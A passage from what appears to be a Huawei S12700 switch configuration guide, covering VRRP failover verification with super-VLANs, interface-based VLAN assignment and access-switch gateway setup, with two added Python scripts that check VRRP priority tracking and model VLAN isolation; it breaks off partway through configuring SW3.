# Configure a VRRP group on SwitchB. SwitchB uses the default priority of 100.
[SwitchB] interface vlanif 11
[SwitchB-Vlanif11] vrrp vrid 1 virtual-ip 10.1.1.1
[SwitchB-Vlanif11] vrrp advertise send-mode 301
[SwitchB-Vlanif11] quit
[SwitchB] interface vlanif 12
[SwitchB-Vlanif12] vrrp vrid 2 virtual-ip 10.1.2.1
[SwitchB-Vlanif12] vrrp advertise send-mode 302
[SwitchB-Vlanif12] quit
[SwitchB] interface vlanif 13
[SwitchB-Vlanif13] vrrp vrid 3 virtual-ip 10.1.3.1
[SwitchB-Vlanif13] vrrp advertise send-mode 303
[SwitchB-Vlanif13] quit
[SwitchB] interface vlanif 14
[SwitchB-Vlanif14] vrrp vrid 4 virtual-ip 10.1.4.1
[SwitchB-Vlanif14] vrrp advertise send-mode 304
[SwitchB-Vlanif14] quit
[SwitchB] interface vlanif 15
[SwitchB-Vlanif15] vrrp vrid 5 virtual-ip 10.1.5.1
[SwitchB-Vlanif15] vrrp advertise send-mode 305
[SwitchB-Vlanif15] quit

Step 5 Disable STP on SwitchA, SwitchB, SwitchC, and the switch.

# Disable global STP on SwitchA, SwitchB, SwitchC, and the switch. SwitchA is used as an
example. The configurations of SwitchB, SwitchC, and the switch are similar to the
configuration of SwitchA, and are not mentioned here. For details, see the configuration files.
[SwitchA] stp disable

Step 6 Verify the configuration.

# After the configuration is complete, run the display vrrp command on SwitchA. You can
see that SwitchA is the master in VRRP group 1. VRRP group 1 is used as an example.
Information of other VRRP groups is similar to information of VRRP group 1.
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : UP
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

# Run the display vrrp command on SwitchB. You can see that SwitchB is the backup.
VRRP group 1 is used as an example.
[SwitchB] display vrrp 1
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

# Run the shutdown command on GE1/0/1 of SwitchA to simulate a link fault. Then run the
display vrrp command on SwitchA and SwitchB. You can see that SwitchA is in Backup
state, SwitchB enters the Master state, and the associated interface becomes Down.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] shutdown
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.3
Send VRRP packet to subvlan : 301
PriorityRun : 20
PriorityConfig : 120
MasterPriority : 100
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : DOWN
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38
[SwitchB] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.3
Send VRRP packet to subvlan : 301
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 100
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38

# Run the undo shutdown command on GE1/0/1 of SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] undo shutdown
[SwitchA-GigabitEthernet1/0/1] quit

# After 20s, run the display vrrp command on SwitchA and SwitchB. You can see that
SwitchA becomes the master again and SwitchB the backup, and the associated interface is in
Up state.
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : UP
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36
[SwitchB] display vrrp 1
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36

----End
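The priority arithmetic that Steps 4 and 6 rely on (configured priority 120, minus 100 for each tracked interface that goes Down, compared with SwitchB's default 100) can be checked automatically from display vrrp output. The following Python script is an added example, not part of this Huawei document: it parses the output format shown in Step 6 (abridged copies of that output are embedded as sample input) and reports the inconsistencies a monitoring job would want flagged.

```python
"""Parse Huawei 'display vrrp <vrid>' output (the format shown in Step 6) and
re-derive the priority tracking this example relies on: PriorityRun equals
PriorityConfig minus the 'reduced' value of every tracked interface that is
Down, and the switch stays Master only while that value beats the peer's.
Added example, not part of the Huawei document; the two sample outputs are
abridged copies of the document's own verification output."""
import re

# SwitchA with both tracked links up: priority 120 beats SwitchB's default 100.
SWITCHA_HEALTHY = """\
Vlanif11 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.1
Master IP : 10.1.1.2
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
Auth type : NONE
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : UP
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
"""

# SwitchA after 'shutdown' on GE1/0/1: 120 - 100 = 20 < 100, so SwitchB took over.
SWITCHA_UPLINK_DOWN = """\
Vlanif11 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.1
Master IP : 10.1.1.3
PriorityRun : 20
PriorityConfig : 120
MasterPriority : 100
Preempt : YES Delay Time : 20 s
Auth type : NONE
Track IF : GigabitEthernet1/0/1 Priority reduced : 100
IF state : DOWN
Track IF : GigabitEthernet1/0/2 Priority reduced : 100
IF state : UP
"""


def parse_display_vrrp(text):
    """Turn one 'display vrrp <vrid>' block into a dict. Tracked interfaces are
    collected under 'tracks' as [name, reduced, state] lists."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    head = re.match(r"(\S+)\s*\|\s*Virtual Router\s+(\d+)", lines[0])
    if not head:
        raise ValueError("missing 'Vlanif | Virtual Router' header line")
    st = {"interface": head.group(1), "vrid": int(head.group(2)), "tracks": []}
    for line in lines[1:]:
        track = re.match(r"Track IF\s*:\s*(\S+)\s+Priority reduced\s*:\s*(\d+)", line)
        if track:
            st["tracks"].append([track.group(1), int(track.group(2)), "UNKNOWN"])
            continue
        state = re.match(r"IF state\s*:\s*(\S+)", line)
        if state and st["tracks"]:
            st["tracks"][-1][2] = state.group(1)  # belongs to the preceding Track IF line
            continue
        # Everything else is 'Key : Value'; 'Preempt : YES Delay Time : 20 s' holds two pairs.
        for key, val in re.findall(r"([A-Za-z][A-Za-z ]*?)\s*:\s*(\S+)", line):
            st[key.strip()] = val
    for key in ("PriorityRun", "PriorityConfig", "MasterPriority", "Delay Time"):
        st[key] = int(st.get(key, 0))
    return st


def expected_priority_run(st):
    """Configured priority minus the reduction of every tracked interface not Up."""
    return st["PriorityConfig"] - sum(r for _, r, s in st["tracks"] if s != "UP")


def check_status(st):
    """Consistency checks a monitoring job would apply to one parsed output."""
    expected = expected_priority_run(st)
    if st["State"] == "Master":
        role_ok = st["PriorityRun"] == st["MasterPriority"]  # a master advertises itself
    else:
        # A backup running a higher priority than the master is legitimate only
        # while its preemption delay is still counting down.
        role_ok = st["PriorityRun"] <= st["MasterPriority"] or st.get("Preempt") == "YES"
    notes = [f"tracked interface {n} is {s}" for n, _, s in st["tracks"] if s != "UP"]
    if st["PriorityRun"] != expected:
        notes.append(f"PriorityRun {st['PriorityRun']} differs from expected {expected}")
    if st.get("Auth type") == "NONE":
        notes.append("VRRP advertisements are not authenticated")
    return {"expected_priority_run": expected,
            "priority_ok": st["PriorityRun"] == expected,
            "role_ok": role_ok, "notes": notes}
```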

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 11 to 15 101 to 180 301 to 305 400
#
stp disable
#
vlan 11
aggregate-vlan
access-vlan 101 to 116 301
vlan 12
aggregate-vlan
access-vlan 117 to 132 302
vlan 13
aggregate-vlan
access-vlan 133 to 148 303
vlan 14
aggregate-vlan
access-vlan 149 to 164 304
vlan 15
aggregate-vlan
access-vlan 165 to 180 305
#
interface Vlanif11
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.1
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
vrrp vrid 1 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 1 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 301
#
interface Vlanif12
ip address 10.1.2.2 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.2.1
vrrp vrid 2 priority 120
vrrp vrid 2 preempt-mode timer delay 20
vrrp vrid 2 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 2 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 302
#
interface Vlanif13
ip address 10.1.3.2 255.255.255.0
vrrp vrid 3 virtual-ip 10.1.3.1
vrrp vrid 3 priority 120
vrrp vrid 3 preempt-mode timer delay 20
vrrp vrid 3 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 3 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 303
#
interface Vlanif14
ip address 10.1.4.2 255.255.255.0
vrrp vrid 4 virtual-ip 10.1.4.1
vrrp vrid 4 priority 120
vrrp vrid 4 preempt-mode timer delay 20
vrrp vrid 4 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 4 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 304
#
interface Vlanif15
ip address 10.1.5.2 255.255.255.0
vrrp vrid 5 virtual-ip 10.1.5.1
vrrp vrid 5 priority 120
vrrp vrid 5 preempt-mode timer delay 20
vrrp vrid 5 track interface gigabitethernet1/0/1 reduced 100
vrrp vrid 5 track interface gigabitethernet1/0/2 reduced 100
vrrp advertise send-mode 305
#
interface Vlanif400
ip address 192.168.1.1 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 301 to 305
mode lacp
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 400
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 101 to 180
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
interface GigabitEthernet1/0/4
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 11 to 15 101 to 180 200 301 to 305
#
stp disable
#
vlan 11
aggregate-vlan
access-vlan 101 to 116 301
vlan 12
aggregate-vlan
access-vlan 117 to 132 302
vlan 13
aggregate-vlan
access-vlan 133 to 148 303
vlan 14
aggregate-vlan
access-vlan 149 to 164 304
vlan 15
aggregate-vlan
access-vlan 165 to 180 305
#
interface Vlanif11
ip address 10.1.1.3 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.1
vrrp advertise send-mode 301
#
interface Vlanif12
ip address 10.1.2.3 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.2.1
vrrp advertise send-mode 302
#
interface Vlanif13
ip address 10.1.3.3 255.255.255.0
vrrp vrid 3 virtual-ip 10.1.3.1
vrrp advertise send-mode 303
#
interface Vlanif14
ip address 10.1.4.3 255.255.255.0
vrrp vrid 4 virtual-ip 10.1.4.1
vrrp advertise send-mode 304
#
interface Vlanif15
ip address 10.1.5.3 255.255.255.0
vrrp vrid 5 virtual-ip 10.1.5.1
vrrp advertise send-mode 305
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
#
interface Eth-Trunk1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 301 to 305
mode lacp
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 101 to 180
#
interface GigabitEthernet1/0/3
eth-trunk 1
#
interface GigabitEthernet1/0/4
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 200 300 400
#
stp disable
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 172.16.1.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.1.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 400
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/3
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 300
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of the switch
#
sysname Switch
#
vlan batch 11 to 15 101 to 180
#
stp disable
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 11 to 15 101 to 180
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 11 to 15 101 to 180
#
return

6.3 Typical VLAN Configuration

6.3.1 Example for Configuring Interface-based VLAN Assignment

Interface-based VLAN Assignment Overview


VLANs can be assigned based on interfaces, MAC addresses, IP subnets, protocols, and
policies (MAC addresses, IP addresses, and interfaces). Table 6-2 compares different VLAN
assignment modes.

Table 6-2 Comparisons among VLAN assignment modes

Interface-based VLAN assignment
Implementation: VLANs are assigned based on interfaces. A network administrator preconfigures a PVID for each interface on a switch. When an untagged frame arrives at an interface, the switch adds the PVID of the interface to the frame. The frame is then transmitted in the VLAN specified by the PVID.
Advantage: It is simple to define VLAN members.
Disadvantage: The network administrator needs to reconfigure VLANs when VLAN members change.
Usage Scenario: Applies to networks of any scale and with devices at fixed locations.

MAC address-based VLAN assignment
Implementation: VLANs are assigned based on source MAC addresses of frames. A network administrator preconfigures mappings between MAC addresses and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the MAC address of the frame to the frame. Then the frame is transmitted in the specified VLAN.
Advantage: When physical locations of users change, the network administrator does not need to reconfigure VLANs for the users. This improves security and access flexibility on a network.
Disadvantage: The network administrator must predefine VLANs for all members on a network.
Usage Scenario: Applies to small-scale networks where user terminals often change physical locations but their NICs seldom change, for example, mobile computers.

IP subnet-based VLAN assignment
Implementation: VLANs are assigned based on source IP addresses and subnet masks. A network administrator preconfigures mappings between IP addresses and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the IP address of the frame to the frame. Then the frame is transmitted in the specified VLAN.
Advantage:
l When physical locations of users change, the network administrator does not need to reconfigure VLANs for the users.
l This mode reduces communication traffic and allows a broadcast domain to span multiple switches.
Disadvantage: Users are distributed regularly and multiple users are on the same network segment.
Usage Scenario: Applies to scenarios where there are high requirements for mobility and simplified management and low requirements for security. For example, this mode can be used if a PC with multiple IP addresses needs to access servers on different network segments or a PC needs to join a new VLAN automatically after the PC's IP address changes.

Protocol-based VLAN assignment
Implementation: VLANs are assigned based on protocol (suite) types and encapsulation formats of frames. A network administrator preconfigures mappings between protocol types and VLAN IDs. When receiving an untagged frame, the switch adds the VLAN tag mapping the protocol type of the frame to the frame. The frame is then transmitted in the specified VLAN.
Advantage: This mode binds service types to VLANs, facilitating management and maintenance.
Disadvantage:
l The network administrator must preconfigure mappings between all protocol types and VLAN IDs.
l The switch needs to analyze protocol address formats and convert the formats, which consumes excessive resources. Therefore, this mode slows down switch response time.
Usage Scenario: Applies to networks using multiple protocols.

Policy-based VLAN assignment (MAC addresses, IP addresses, and interfaces)
Implementation: VLANs are assigned based on policies such as combinations of interfaces, MAC addresses, and IP addresses. A network administrator preconfigures policies. When receiving an untagged frame that matches a configured policy, the switch adds a specified VLAN tag to the frame. The frame is then transmitted in the specified VLAN.
Advantage:
l This mode provides high security. MAC addresses or IP addresses of users that have been bound to VLANs cannot be changed.
l The network administrator can flexibly select which policies to use according to the management mode and requirements.
Disadvantage: Each policy needs to be manually configured.
Usage Scenario: Applies to complex networks.

Interface-based VLAN assignment is the simplest and most commonly used method.

Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-8, the switch of an enterprise connects to many users, and users
accessing the same service connect to the enterprise network through different devices. To
ensure communication security and prevent broadcast storms, the enterprise requires that
users using the same service communicate with each other and users accessing different
services be isolated. You can configure interface-based VLAN assignment on the switch so
that the switch adds interfaces connected to users using the same service to the same VLAN.
Users in different VLANs cannot communicate with each other at Layer 2, and users in the
same VLAN can communicate with each other.

Figure 6-8 Networking of interface-based VLAN assignment

[Figure: SwitchA and SwitchB are connected through their GE1/0/3 interfaces. On SwitchA, GE1/0/1 connects User1 (VLAN 2) and GE1/0/2 connects User3 (VLAN 3); on SwitchB, GE1/0/1 connects User2 (VLAN 2) and GE1/0/2 connects User4 (VLAN 3).]

Configuration Roadmap
The configuration roadmap is as follows:

1. Create VLANs and add interfaces that connect users to VLANs to isolate Layer 2 traffic
of different services.
2. Configure link types of interfaces between SwitchA and SwitchB and VLANs allowed
by interfaces so that users accessing the same service can communicate with each other
through SwitchA and SwitchB.

Procedure
Step 1 Create VLAN 2 and VLAN 3 on SwitchA and add interfaces that are connected to users to
VLANs. The configuration of SwitchB is similar to the configuration of SwitchA, and is not
mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 2 3 //Create VLAN 2 and VLAN 3 in a batch.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //The interface connected
to the access device must be the access interface. The default link type of an
interface is not access, so you need to manually configure the access interface.
[SwitchA-GigabitEthernet1/0/1] port default vlan 2 //Add GE1/0/1 to VLAN 2.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 3 //Add GE1/0/2 to VLAN 3.
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Configure the link type of the interface on SwitchA that is connected to SwitchB and VLAN
allowed by the interface. The configuration of SwitchB is similar to the configuration of
SwitchA, and is not mentioned here.

[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk //The link type of
interfaces connecting switches must be trunk. The default link type of an
interface is not trunk, so you need to manually configure the trunk interface.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 2 3 //Add GE1/0/3 to
VLAN 2 and VLAN 3.

Step 3 Verify the configuration.

User1 and User2 are on the same network segment, for example, 192.168.100.0/24; User3 and
User4 are on the same network segment, for example, 192.168.200.0/24.

User1 and User2 can ping each other, but cannot ping User3 or User4. User3 and User4 can
ping each other, but cannot ping User1 or User2.

----End
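To make the Layer 2 isolation verified in Step 3 concrete, the following Python model is an added example (not from this Huawei document) of how interface-based VLAN assignment treats frames: it implements the PVID tagging described in Table 6-2 for the SwitchA/SwitchB layout of this section. The trunk's default allowance of VLAN 1 and the frames themselves are constructed assumptions of the model.

```python
"""Model of interface-based VLAN assignment as described in Table 6-2 and 6.3.1:
an access interface tags an untagged frame with its PVID, a trunk interface
forwards only the VLANs it allows, and a frame is flooded inside one VLAN only,
so User1 and User2 (VLAN 2) reach each other while User3 and User4 (VLAN 3)
are isolated from them at Layer 2. Added example, not from the Huawei document;
the port/VLAN layout follows the 6.3.1 configuration files, the frames are
constructed."""
from dataclasses import dataclass, field


@dataclass
class Port:
    kind: str                    # "access" or "trunk"
    pvid: int = 1                # 'port default vlan' on an access port; VLAN 1 otherwise
    allowed: set = field(default_factory=lambda: {1})  # trunk allow-pass list; VLAN 1 by default
    link: tuple = None           # (peer switch, peer port) for a trunk, None for a host port


@dataclass
class Frame:
    src: str
    dst: str = "broadcast"
    vlan: int = None             # None means the frame arrived untagged


class Switch:
    def __init__(self, name):
        self.name, self.ports = name, {}

    def classify(self, port_name, frame):
        """VLAN the frame is placed in at ingress, or None if the port drops it."""
        p = self.ports[port_name]
        if p.kind == "access":
            # Untagged frames receive the PVID; tagged frames for other VLANs are dropped.
            return p.pvid if frame.vlan in (None, p.pvid) else None
        if frame.vlan is None:
            return p.pvid if p.pvid in p.allowed else None  # trunk's untagged (PVID) VLAN
        return frame.vlan if frame.vlan in p.allowed else None

    @staticmethod
    def carries(port, vlan):
        """Whether a frame in 'vlan' may leave through this port."""
        return port.pvid == vlan if port.kind == "access" else vlan in port.allowed


def deliver(switches, hosts, sw_name, port_name, frame, seen=None):
    """Flood one frame from an ingress port and return the hosts that receive it."""
    seen = set() if seen is None else seen
    sw = switches[sw_name]
    vlan = sw.classify(port_name, frame)
    if vlan is None or (sw_name, port_name) in seen:
        return set()
    seen.add((sw_name, port_name))
    reached = set()
    for name, p in sw.ports.items():
        if name == port_name or not sw.carries(p, vlan):
            continue
        if p.link is None:
            reached.add(hosts[(sw_name, name)])   # access port: tag stripped, host receives it
        else:
            # Trunk: forward tagged with the VLAN and keep flooding on the peer switch.
            reached |= deliver(switches, hosts, *p.link, Frame(frame.src, frame.dst, vlan), seen)
    return reached


def build_figure_6_8():
    """Topology of Figure 6-8 with the SwitchA and SwitchB configuration files applied."""
    a, b = Switch("SwitchA"), Switch("SwitchB")
    for sw, peer in ((a, "SwitchB"), (b, "SwitchA")):
        sw.ports["GE1/0/1"] = Port("access", pvid=2)             # port default vlan 2
        sw.ports["GE1/0/2"] = Port("access", pvid=3)             # port default vlan 3
        sw.ports["GE1/0/3"] = Port("trunk", allowed={1, 2, 3},   # port trunk allow-pass vlan 2 to 3
                                   link=(peer, "GE1/0/3"))
    hosts = {("SwitchA", "GE1/0/1"): "User1", ("SwitchA", "GE1/0/2"): "User3",
             ("SwitchB", "GE1/0/1"): "User2", ("SwitchB", "GE1/0/2"): "User4"}
    return {"SwitchA": a, "SwitchB": b}, hosts


def broadcast_domain(switches, hosts, user):
    """Hosts that receive an untagged broadcast sent by 'user', i.e. its Layer 2 reach."""
    [(sw_name, port_name)] = [k for k, v in hosts.items() if v == user]
    return deliver(switches, hosts, sw_name, port_name, Frame(src=user))
```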

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 2 to 3
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 2
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 3
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
return

Related Content
Support Community

l VLAN Basics
l VLAN Assignment

Videos

l Configuring Interface-based VLAN Assignment
l Configuring Interface-based VLAN Assignment (FAQ)
l Deploying a Layer 2 Switch on a LAN

6.3.2 Example for Configuring Interface-based VLAN Assignment (Access Device Used as the Gateway)

Overview
VLANs can be assigned based on interfaces, MAC addresses, IP subnets, protocols, and
policies (MAC addresses, IP addresses, and interfaces). Interface-based VLAN assignment is
the simplest and most commonly used method.

Interface-based VLAN assignment indicates that VLANs are assigned based on interfaces. A
network administrator preconfigures a PVID for each interface on a switch. When an
untagged frame arrives at an interface, the switch adds the PVID of the interface to the frame.
Then the frame is transmitted in a specified VLAN.

In typical hierarchical networking, when the access switch is a Layer 3 switch, the access
switch can be used as the gateway of PCs to simplify the configuration of the aggregation
switch.

Configuration Notes
This example applies to all versions of the S12700.

Networking Requirements
As shown in Figure 6-9, PC1 and PC2 belong to VLAN 2 and VLAN 3, respectively. PC1
and PC2 connect to the aggregation switch SW1 through the access switch SW2. PC3 belongs
to VLAN 4 and connects to SW1 through SW3. SW2 functions as the gateway of PC1 and
PC2, and SW3 is used as the gateway of PC3. Static routes are configured on switches so that
PCs can communicate with each other and can be connected to the router.

Figure 6-9 Configuring access devices as gateways

[Figure: GE1/0/1 of the aggregation switch SW1 is the uplink towards the router. SW1 GE1/0/2 connects to SW2 GE1/0/1, and SW1 GE1/0/3 connects to SW3 GE1/0/1; SW2 and SW3 are the gateways of the PCs. SW2 GE1/0/23 connects PC1 (VLAN 2, IP address 192.168.2.2/24, gateway address 192.168.2.1), SW2 GE1/0/24 connects PC2 (VLAN 3, IP address 192.168.3.2/24, gateway address 192.168.3.1), and SW3 GE1/0/2 connects PC3 (VLAN 4, IP address 192.168.4.2/24, gateway address 192.168.4.1).]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure interface-based VLAN assignment on the access switches to implement Layer 2
interworking.
2. Configure access switches as gateways of PCs to implement communication between
PCs on different network segments.
3. Configure static routes on the aggregation switch so that PCs can communicate with the
router.

Procedure
Step 1 Configure SW2.
# Create VLANs.
<HUAWEI> system-view
[HUAWEI] sysname SW2 //Change the device name to SW2 for easy identification.
[SW2] vlan batch 2 to 3 //Create VLAN 2 and VLAN 3 in a batch.

# Add interfaces to VLANs.
[SW2] interface gigabitethernet 1/0/23
[SW2-GigabitEthernet1/0/23] port link-type access //Configure the interface
connected to the PC as the access interface.
[SW2-GigabitEthernet1/0/23] port default vlan 2 //Add PC1 to VLAN 2.
[SW2-GigabitEthernet1/0/23] quit
[SW2] interface gigabitethernet 1/0/24
[SW2-GigabitEthernet1/0/24] port link-type access
[SW2-GigabitEthernet1/0/24] port default vlan 3 //Add PC2 to VLAN 3.
[SW2-GigabitEthernet1/0/24] quit

# Configure VLANIF interfaces and configure IP addresses for VLANIF interfaces as
gateway addresses of PCs.
[SW2] interface vlanif 2 //Create VLANIF 2.
[SW2-Vlanif2] ip address 192.168.2.1 24 //Configure an IP address for VLANIF 2.
The IP address is the gateway address of PC1.
[SW2-Vlanif2] quit
[SW2] interface vlanif 3 //Create VLANIF 3.
[SW2-Vlanif3] ip address 192.168.3.1 24 //Configure an IP address for VLANIF 3.
The IP address is the gateway address of PC2.
[SW2-Vlanif3] quit

# Connect SW2 to SW1.
[SW2] vlan batch 5 //Create VLAN 5.
[SW2] interface gigabitethernet 1/0/1
[SW2-GigabitEthernet1/0/1] port link-type access
[SW2-GigabitEthernet1/0/1] port default vlan 5 //Configure SW2 and SW1 to
communicate in untagged mode.
[SW2-GigabitEthernet1/0/1] quit
[SW2] interface vlanif 5 //Create VLANIF 5.
[SW2-Vlanif5] ip address 192.168.5.2 24 //Configure an IP address for VLANIF 5.
The IP address is the IP address of the interconnected interface between SW1 and
SW2.
[SW2-Vlanif5] quit
[SW2] ip route-static 0.0.0.0 0.0.0.0 192.168.5.1 //Configure a default route so
that the PC can access the router. The next hop address is the IP address of the
interface connected to SW1.

Step 2 Configure SW3.
# Create VLANs.


<HUAWEI> system-view
[HUAWEI] sysname SW3 //Change the device name to SW3.
[SW3] vlan batch 4 //Create VLAN 4.

# Add interfaces to VLANs.
[SW3] interface gigabitethernet 1/0/2
[SW3-GigabitEthernet1/0/2] port link-type access //Configure the interface
connected to the PC as the access interface.
[SW3-GigabitEthernet1/0/2] port default vlan 4 //Add PC3 to VLAN 4.
[SW3-GigabitEthernet1/0/2] quit

# Configure VLANIF interfaces and configure IP addresses for VLANIF interfaces as
gateway addresses of PCs.
[SW3] interface vlanif 4 //Create VLANIF 4.
[SW3-Vlanif4] ip address 192.168.4.1 24 //Configure an IP address for VLANIF 4.
The IP address is the gateway address of PC3.
[SW3-Vlanif4] quit

# Connect SW3 to SW1.
[SW3] vlan batch 5 //Create VLAN 5.
